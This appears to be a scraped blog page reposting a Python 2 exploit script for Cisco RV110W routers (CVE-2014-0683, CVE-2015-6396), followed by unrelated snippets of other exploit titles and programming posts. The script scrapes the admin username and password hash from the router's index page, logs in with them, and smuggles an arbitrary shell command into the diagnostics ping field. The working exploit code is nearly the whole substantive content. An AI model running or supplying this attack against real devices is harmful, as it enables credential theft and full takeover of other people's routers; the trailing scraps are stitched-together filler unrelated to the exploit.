[EXP]Cisco RV110W - Password Disclosure / Command Execution
#!/usr/bin/env python2 #####
## Cisco RV110W Password Disclosure and OS Command Execute.
### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.) # Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
# Date: 2018-08
# Exploit Author: RySh
# Vendor Homepage: https://www.cisco.com/
# Version: 1.1.0.9
# Tested on: RV110W 1.1.0.9
# CVE : CVE-2014-0683, CVE-2015-6396 import os
import sys
import re
import urllib
import urllib2
import getopt
import json import ssl ssl._create_default_https_context = ssl._create_unverified_context ###
# Usage: ./{script_name} 192.168.1.1 443 "reboot"
### if __name__ == "__main__":
IP = argv[1]
PORT = argv[2]
CMD = argv[3] # Get session key, Just access index page.
url = 'https://' + IP + ':' + PORT + '/'
req = urllib2.Request(url)
result = urllib2.urlopen(req)
res = result.read() # parse 'admin_pwd'! -- Get credits
admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd # Get session_id by POST
req2 = urllib2.Request(url + "login.cgi")
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": "",
"change_action": "",
"enc": "",
"user": admin_user,
"pwd": admin_pwd,
"sel_lang": "EN"
}
r = urllib2.urlopen(req2, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] # Execute your commands via diagnose command parameter, default command is `reboot`
req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req3.add_header('Origin', url)
req3.add_header('Upgrade-Insecure-Requests', 1)
req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
req3.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req3.add_header('Referer', url)
req3.add_header('Accept-Encoding', 'gzip, deflate')
req3.add_header('Accept-Language', 'en-US,en;q=0.9')
req3.add_header('Cookie', 'SessionID=')
data_cmd = {"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"gui_action": "",
"traceroute_ip": "",
"commit": "",
"ping_times": "3 |" + CMD + "|",
"ping_size": "",
"wait_time": "",
"ping_ip": "127.0.0.1",
"lookup_name": ""
}
r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
[EXP]Cisco RV110W - Password Disclosure / Command Execution的更多相关文章
- [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...
- [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...
- PowerShell vs. PsExec for Remote Command Execution
Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...
- struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite
catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...
- struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution
catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...
- Fatal error encountered during command execution
MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...
- MYSQL报Fatal error encountered during command execution.错误的解决方法
{MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...
- My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution
Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...
- JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution
CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...
随机推荐
- pipeline-安全测试
代码安全检查 需要安装SonarQube(版本6.7,安装了Findbugs插件) MySQL >=5.6,笔者安装的是MySQL 5.7版本 Jenkins需要安装下列插件: SonarQub ...
- sql存储过程进行条件筛选
1.创建临时表,把存储过程结果集保存到临时表,对临时表进行筛选. Create Table #TmpTable(FieldList) Insert Into #TmpTable Exec StoreP ...
- mysql-8.0.15-winx64 解压版安装 图文详解
1.官网下载 https://dev.mysql.com/downloads/mysql/ 2.解压到合适的目录 3.配置环境变量 ①. path ②.MYSQL_HOME 4.新建一个my.ini ...
- JavaSE基础知识(1)—初识Java
一.JAVA的背景 JAVA本身隶属的公司的是sun公司(创始公司) JAVA创始人:詹姆斯 高斯林 09年被oracle收购 JAVA的前身是Oak 二.JAVA的版本 95年 JAVA诞生96年 ...
- 接口测试3A原则
手工的功能测试用例也可以用3A原则来编写. Arrange: 准备被测功能相关的测试数据,比如往系统里录入一批工单以便测试工单的分页功能 Act : 调用被测的功能,实际上这就是我们一直讲的测试步骤 ...
- jQuery的事件,动画效果等
一.事件 click(function(){}) 点击事件 hover(function(){}) 悬浮事件,这是jQuery封装的,js没有不能绑定事件 focus(function(){}) ...
- Linux运维40道精华题
题目 1.什么是运维?什么是游戏运维? 1)运维是指大型组织已经建立好的网络软硬件的维护,就是要保证业务的上线与运作的正常,在他运转的过程中,对他进行维护,他集合了网络.系统.数据库.开发.安全.监控 ...
- python基本数据类型之整型和浮点型
python基本数据类型之数字与浮点型 在python3中,整数的数据类型为int,而浮点数的数据类型为float.python2中整数可以是int和long(长整型)两种类型,python3只保留了 ...
- python调用 sshpass
[root@qinhan ~]# ifconfig eno16777736: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 ine ...
- jquery的ajax及注意事项
1.引jquery包(jquery-1.8.0.min.js) <script type="text/javascript"> $(function () { //根据 ...